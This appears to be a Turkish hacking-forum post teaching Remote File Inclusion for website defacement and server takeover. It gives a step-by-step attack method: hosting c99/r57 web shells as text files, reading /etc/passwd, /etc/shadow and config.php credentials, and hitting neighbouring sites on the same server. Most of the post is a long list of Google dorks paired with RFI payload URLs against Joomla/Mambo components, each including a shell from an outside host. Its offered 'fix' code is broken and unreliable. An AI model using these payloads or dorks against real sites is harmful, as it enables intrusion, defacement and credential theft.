Remote File Inclusion RFI Hakkında Geniş Döküman + Videolu

Kodla Büyü

KingSkrupellos

Seçkin Üye
Seçkin Üye
Mesajlar
554
Merhaba arkadaşlar ben KingSkrupellos. Bugün size Remote File Inclusion ( RFI ) Difeys hakkında bilgilendirme yapıcağım. Rfi nedir, ne işe yarar, RFI Difeys nasıl yapılır. RFI açıkları nasıl kapatılır. Güncel RFI Açıkları hakkında bilgi vermek istiyorum ve bu açıklar nasıl kullanılır yada sitenizde açıklar varsa kapatabilirsiniz.
1900ac.png

2c312d.jpg

Not : Konuyu UlakBilim.Gov.Tr’den alıntı yaparak ve diğer sitelerden alarak toplu bir şekilde, aralara kendi bilgilerimide katarak, hatta derleyip toparlayıp bir döküman hazırladım sizlere.
Videolu Anlatımlar =>
Kod:
http://www.youtube.com/watch?v=6zJDeRsoULM
http://www.youtube.com/watch?v=Sy9ihNiCJ1Y
http://www.youtube.com/watch?v=iHo51gVwAkI
http://www.youtube.com/watch?v=4-DIAdmSgRk
http://www.youtube.com/watch?v=BJP1TRrLRE8
http://www.youtube.com/watch?v=dN34UDfhLiA
http://www.youtube.com/watch?v=Lg9UdKL1Cfw
http://www.youtube.com/watch?v=bCy_5smSRys
http://www.youtube.com/watch?v=qwRdrvr17II
http://www.youtube.com/watch?v=QME9o6FTXwU
http://www.youtube.com/watch?v=_vkDGSpMYrw
http://www.youtube.com/watch?v=e5yGxP0XqJQ
http://www.youtube.com/watch?v=hXRrZL4vqTw
Remote File Inclusion (RFI) günümüzde siklikla web sayfalarinin deface edilmesinde veya web sunucularinin hack edilmesinde kullanilan bir yöntem olmutur. Bu kadar çok hataya neden olan web kodlarini yazan veya gelitirenlerin dikkatsizce kod yazmalari, sistem yöneticilerinin de sunucular üzerinde yeteri kadar önlem almamalaridir.
Rfi Nedir ?
Rfi “Remote File İnclusion” uzaktan dosya çağırmaktır.
Nasıl oluşur ?
Rfi kod yazan kişilerin PHP scriptlerinde Yaptığı hatalardan Kaynaklanır. Sadece Php dili ile yazılmış scriptlerde bulunur.
include
include_once
require
require_once
Bu Değerler dosya dahil etme kodlarıdır.Eğer Admin Bu dosyaları Tanımlamaz ise Boş kalır.Bizde Bu Boş olan yeri Yani Tanımlanmayan Değeri Shell Adresi ile doldurup serverde Shell Çalıştırabiliriz.
Basitce Örnek:
helper.php = Dosyasını incelediğimizde
Burada ‘Shellman’ tanımlanmamış.
Yani biz bunu ’ http://www.siteadresi.com/helper.php…n=Shelladresi? ’
Shell adresi ile doldurabiliriz.Sonuç olarak Servere Shell Atmış olduk.

RFI Açığı Tespiti ve Uzaktan Dosya Dahil Etmek - Döküman
Bu makalemizde size rfı, açıklarının nasıl meydana geldiğini, uzaktan dosya çağırma işlemini, shell çağırma yöntemini rfı, açığını nasıl fixleyeceğimizi (kapatabileceğimizi) kodlarla ve örneklerle anlatmaya çalışacağım.

Bildiğiniz üzere (Remota File İnclusion) uzaktan dosya çağırmak anlamına gelmektedir.

1-RFI açığı nasıl oluşur
2-Tanımlama nasıl yapılır
3-RFI Açığı Tesbiti
4-Shell Dahil Etmek
5-Örnek RFI bug
6-Örnek RFI Fix
7-RFI Açıkları nasıl bulunur.

1-Rfı açığı nasıl oluşur?

RFI, web uyguklamalarındaki hatalı kodlamadan dolayı oluşur. Bir kodla örnek verecek olursak;

İnclude (“$haberler/spor/sanat.php); buradaki dolar işaretinden dolayı uzaktan dosya çağırma mümkündür. Kodlama bu şekilde tanımlanmadan scripte dahil edilirse, kesinlikle uzaktan dosya çağırmaya Başka bir örnekle pekiştirelim.

İnclude
include_once
require
require_once

Scripti kodlayan kişi tanımlamadan bu kodları scripte dahil ederse, uzaktan dosya çağırma işlemi mümkün olmuş, olur.

2-Tanımlama nasıl yapılır

include ("$haberler/spor/sanat.php"); Tanımlanmamış kod.
<?php
$haberler/spor/sanat.php =’tanımlı değer’
include ("$haberler/spor/sanat.php");
?>

Bu şekilde haberler, spor, sanat üçlüsünü tanımlamış olduk.

3-Rfı açığı tespiti

Hedef siteyi açtığınızda rfı açığı olup olmadığını anlamak için siteye hata verdirmeniz, gerekmektedir

Örneğin;

www.hedefsite.com/articles.php?id=10
www.hedefsite.com/articles.php?id=http: ... berizm.org bu şekilde yönlendirmeye çalışıyoruz. Siz istediğiniz sayfaya yönlendirebilirsiniz. Örnek olarak söylüyorum, şayet cyberizm’nin anasayfası gelirse, bu sitede rfı açığı var demektir. Bazı rfı açıklarında ise sitenin kendi üzerinde hata vermektedir. Bu sitelerde de rfı arnılabilir. Evet açığı olduğunu düşündüğümüz shell çağırma işlemimizi deneyebiliriz.

4-Shell Dahil Etmek

Burada shell çağırırken yukarıda bahsetmiş olduğumuz yönlendirme işlemini gerçekleştireceğiz. Öncelikle kendi hotsunuza txt halinde shell yüklemeniz gerekiyor. Host adresiniz free olabilir. Örneğin; c99.txt şeklinde. Daha sonra uzaktan bu txt dosyasını yönlendirme işlemi ile hedef sitemize dahil edeceğiz.

www.hedefsite.com/articles.php?id=http: ... et/c99.txt?
Evet bu şekilde sitenize yüklediğiniz txt uzantılı shell’i hedef siteye yüklemiş olursunuz.

5-Örnek Rfı bug

Eğer scriptlerde rfı bug arıyorsanız, bunları iyi bilmeniz gerekmektedir. Örnek bir rfı bug yapalım.

<?php
$page = $_GET [page]; Rfı açığı burada page değerinde
include($page);
?>

6-Örnek RFI Fix

Scriptlerdeki bugları bu konuda verilmiş örnekleri baz alarak kapatabilirsiniz.
<?php
$page = $_GET"./"; Bu kodlamalar ile rfı açığımızı fixlemiş olduk.
include($page);
?>

7-RFI Açıkları nasıl bulunur

RFI, açıklarını mevcut dorklarla ve scannerlerle bulabilirsiniz.

Örnek Dorklar;

inurl:"com_sitemap"
inurl:"com_hashcash"
inurl:"com_colophon" vs..

Ayrıca hedef site üzerinde rfı açığından şüpheleniyorsanız, scannerlerle taratabilirsiniz. Ya da örneklerlede belirttiğimiz gibi manuel açık arayabilirsiniz. Tercihinize kalmış. Şimdilik dökümanımız bu kadar.
YÖNTEM
Rfi Açıklarını Kullanarak Hack Yapacagız;

Önce bakalım nedir bu rfi ? RFI: Remote File İncludes söz öbeğinin kısaLtıLması
olup Türkçe karşılıgı Uzaktan Dosya Çalıştırma oldugunu söyleyebiliriz. Peki nedir uzaktan dosya çalıştırmak veya include etmek. Basitçe anlatmaya çalışırsak PHP kodlamasında include komutu ile çalıştırılması gereken dosyanın yolu gösterilir. Ve bu yolu kullanarak o dosya yerıne bizim istediğimiz başka bir dosyayı(kodu) site üzerinde çalıştırma olayına RFİ diyoruz..

Peki PHP Coderlarının Yaptıgı Bu Kodlama Hatası Bizim Ne İşimize Yarar?

Eğer site (yani server) üzerinde serverdaki dizinleri gösterebilen servera dosya upload edebilen gerektiğinde port açabılen kodlar bulunan bir dosya çalıştırılırsa işte bu "defacer" için büyük bir fırsat oluyor ç). RFI açıkları sayesınde sadece acık olan bı sıteye değil tüm servera hakım olabılıyorsunuz.

ListPath Nedir?

Bu server üzerinde erişime sahip olmamıza yarayan kodlara listpath diy0ruz
piyasada bir sürü listpath mevcut (c99,r57 gibi)

Rfi Açıklarını Nerden Bulurum ?

Bu acıkları sitemizdeki dökümanlardan bulabılırsınız veya kendınızde olmayan bir açık yaratabılırsınız. Kodlama hatalarından bahsettik.

Ne Gibi Hatalar Rfi Açıklarına Sebep Olur?

PHP kodlamalarında kullanılan şu komutlar bizim için önemli:

include
include_once
require
require_once

Bunların oldugu yerlere bakıcaz RFİ ararken.. Şimdi örneklerle açıklayalım:

Yeni portallardan biri olan PHP-Nuke 8.0 Final daki kodları inceliy0ruz ve bakıyoruzki şöyle bir kodlama yapılmıs

Kod:
include($modpath);in nuke8/html/modules.php
$ karakterının yanındaki modpath bizim için önemli. Dosya calıstırma yolumuz modpast oluyor ve açık şu şekilde yazılıyor;

http://www.hedefsite.com/html/module...odpath=http://

Not: Shellimizi bir h0stun içine atmamız gerek,piyasada mevcut.

Başka bir kod inceleyelim


Kod:
include($phpbb_root_path .'extension.inc'); in nuke8/html/modules/Forums/index.php
Böyle bi durumda ise

http://www.hedefsite.com/html/module...hpbb_root_path

Bu acıklardan nasıl saldırı yapabılırız 2 saldırı cesıdı vardır

1) Rastgele Saldırı
2) Sistemli Saldırı

Rastgele saldırıyı şu şekilde yapabilirsiniz RFİ Acıgının oldugu p0rtalı kullanan siteleri o portal ile özdeşleşmiş bir arama ile google'da ararız.

Örnek:

Php-Nuke 7.8 i kullanan siteleri bulmak için

Kod:
Copyright 2005 By Francisco Burzi
Bu şekilde veya sitemızde mevcut acıklarla site hackleyebılırsınız perllerın izin verdiği ölçüde

Perm demişken bu konudanda bahsetmemiz gerekiyor çünkü yazma yetkisi önemlidir. Örneğin bi sitenin serverına rfi ile girdik ve index.php'nin yanında şöyle yazıy0r

rwxr-x---

Burdaki r,w,x ne anlama geliy0r kısaca anlatayım

R:Okuma İzni
W:Yazma İzni
X:Çalıştırma izni

Şimdi az c0k anladınız ne 0ldugunu ama tam değil çünkü kim çalıştırabılır kım okuyabılır şuradan anlıy0ruz:

Yukarıdaki 9 karakter yanyana yazılmıs 3'ü dosya sahibinin yetkilerini 3 tanesı kullanıcı grubunun yetkılerını sonuda her hangi birinin yetkılerını gösteriy0r.

Şimdi geldik asıl önemli olan sistemli saldırıya

1) Hedef Sitenin Portalını Öğrenmek
2) Hazır portal değil ise siteyi hosttan çekmek
3) Sitede acık yok ise serverdaki başka siteye bakmak
4) Acıkk var ise dizine ullaşmak
5) Serverda safe mod Off ise yönetıcı olmaya calısmak
6) Permler izin vermiy0rsa config okuyarak hack


Kısaca anlatayım hepsınden bıraz..

Sitenin portalını öğrenmek gerek bu yuzden sıteyi iyice gezın sağda solda powered veya copyright portal ile ilgili birşey varsa bulduk ve portalı google'dan aratıp acıklarını arayacagız yoksa rfi scanner..

Ama adam kendı kodlamıs diyelim, ozaman acık y0k diyemeyız! İntell,Tamper,Flashget gibi programlarla siteyi taratıy0ruz 20-30 dakika sürebılır ama hedef için değer.. Ama yine acık bulamadık ise
Sitenin ipsini başlat çalıştır cmd ftp hedefsite.com yazıp İP bulacagız ve o ip'yi www.whois.cs sitesınde aratacagız ve farklı siteler cıkıcak bu sefer bu cıkan sıtelerde rfi arayacagız.

Nihayet bulduk ve k0dumuz ile girdik. şimdi hedef dizine ulaşmaya calısmak

Öncelıkle standart bi şekılde kullanıcıların ısımlerının yazılı oldugu klasör olan /etc/passwd klasorune ulaşmaya calısıy0ruz, bulamadıysak

/etc/vdomainaliases
/var/named
/etc/shadow
/var/mail
/etc/secure

Misal bi etc/passwd şu şekildedir

root:x:0:0:root:/root:/bin/bash

şeklindedir

Burdan anlayacagımız şey var/hosts/hedefsite dizininde bulunuy0r ve biz bu dizin ile girdik, 0Lmadı by-Passs

Girdik s0nunda Safe MOd: On ise işimiz zor ama off ise root oLacagız.
THT Üyeleri ; Safe mod on olduğunu düşünürsek önceden bunun metodlarını paylaştım forumda biraz araştırın //PoisonScorpion

Girdik fakat permler yazmamızı engelliy0r bu sefer config okuyarak hack yapacagız. Bu durumda sitenin config.php dosyalarını okuyarak hack yapmaktır
Bu işlemi c99 ile yapabılırız. Bir config.php şu şekıldedır

$dbhost="local host";
$dbuname)"root";
$dbpass"123456"


Kod:
Google araması:
inurl:"com_joomlaboard"

Code:
components/com_joomlaboard/file_upload.php?sbp=http://uyuSsman.by.ru/c99.txt?

components/com_joomlaboard/image_upload.php?sbp=http://uyuSsman.by.ru/c99.txt?


Google araması:
inurl:"com_pollxt"

Site Sonuna:

/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=Shell adresı



Google Araması:
inurl:"com_admin"


Code:
administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?


Google Araması:
inurl:index.php?option=com_simpleboard


Code:
/components/com_simpleboard/file_upload.php?sbp=http://uyuSsman.by.ru/c99.txt?


Google Araması:
inurl:"com_hashcash"


Code:

/components/com_hashcash/server.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?


Google Araması:
inurl:"com_htmlarea3_xtd-c"


Code:

/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?

Google Araması:
inurl:"com_sitemap"


Code:

/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?


Google Araması:
inurl:"com_forum"


Code:
/components/com_forum/download.php?phpbb_root_path=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:"com_pccookbook"


Code:

components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:index.php?option=com_extcalendar


Code:

/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:"minibb"


Code:
components/minibb/index.php?absolute_path=http://uyuSsman.by.ru/c99.txt?




Google Araması:
inurl:"com_smf"


Code:
/components/com_smf/smf.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?

/modules/mod_calendar.php?absolute_path=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:"com_pollxt"


Code:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:"com_loudmounth"


Code:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:"com_videodb"


Code:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?




Google Araması:
inurl:index.php?option=com_pcchess


Code:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?




Google Araması:
inurl:"com_multibanners"


Code:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:"com_a6mambohelpdesk"


Code:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:"com_colophon"


Code:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:"com_mgm"


Code:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:"com_mambatstaff"


Code:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?

Google Araması:
inurl:"com_securityimages"


Code:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?

/components/com_securityimages/lang.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:"com_artlinks"


Code:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?



Google Araması:
inurl:"com_galleria"


Code:

/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?


Google Araması:
inurl:"com_zoom" Bulunan Sonuç : 3.560.000


Code:

components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?

components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?


Google Araması:
inurl:"com_serverstat"


Code:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?



/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?


''inurl:mambo'' googlede aratıyoruz

components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?

Google Araması:
inurl:index.php?option=com_simpleboard
KOD:
/components/com_simpleboard/file_upload.php?sbp=http://hitbaytar.kayyo.com/c99shell.txt?
---------------------------------------------------------------
Google Araması:
inurl:"com_hashcash"

KOD:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
------------------------------------------------------------------------------
Google Araması:
inurl:"com_htmlarea3_xtd-c"
KOD:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
------------------------------------------------------------------------------------
Google Araması:
inurl:"com_sitemap"
KOD:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
--------------------------------------------------------------------
Google Araması:
inurl:"com_forum"
KOD:
/components/com_forum/download.php?phpbb_root_path=http://hitbaytar.kayyo.com/c99shell.txt?
--------------------------------------------------------------------
Google Araması:
inurl:"com_pccookbook"
KOD:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------------------
Google Araması:
inurl:index.php?option=com_extcalendar
KOD:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"minibb"
KOD:
components/minibb/index.php?absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?

-----------------------------------------------------------------------
Google Araması:
inurl:"com_colophon"
KOD:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_mgm"
KOD:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_mambatstaff"
KOD:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_securityimages"
KOD:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
KOD:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_artlinks"
KOD:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http: http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_galleria"
KOD:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?

---------------------------------------------------------------------
Google Araması:
inurl:"com_smf"
KOD:
/components/com_smf/smf.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
KOD:
/modules/mod_calendar.php?absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_pollxt"
KOD:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_loudmounth"
KOD:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
------------------------------------------------------------------------
Google Araması:
inurl:"com_videodb"
KOD:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:index.php?option=com_pcchess
KOD:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_multibanners"
KOD:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_a6mambohelpdesk"

KOD:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://hitbaytar.kayyo.com/c99shell.txt?

Kaynaklar => 
 https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/
http://csirt.ulakbim.gov.tr/dokumanlar/PHP_RFI_SaldiriEngelleme.pdf
http://www.imperva.com/docs/HII_Remote_and_Local_File_Inclusion_Vulnerabilities.pdf

Not 2 : Bazı kaynakları direk alıntı olarak aldım, bazılarını ise kendim derleyip toparlayıp bir daha yazdım, konuya uygun videolar koydum ve resimler upload ettim. Lütfen Emeğe Saygı.
 
Geri
Üst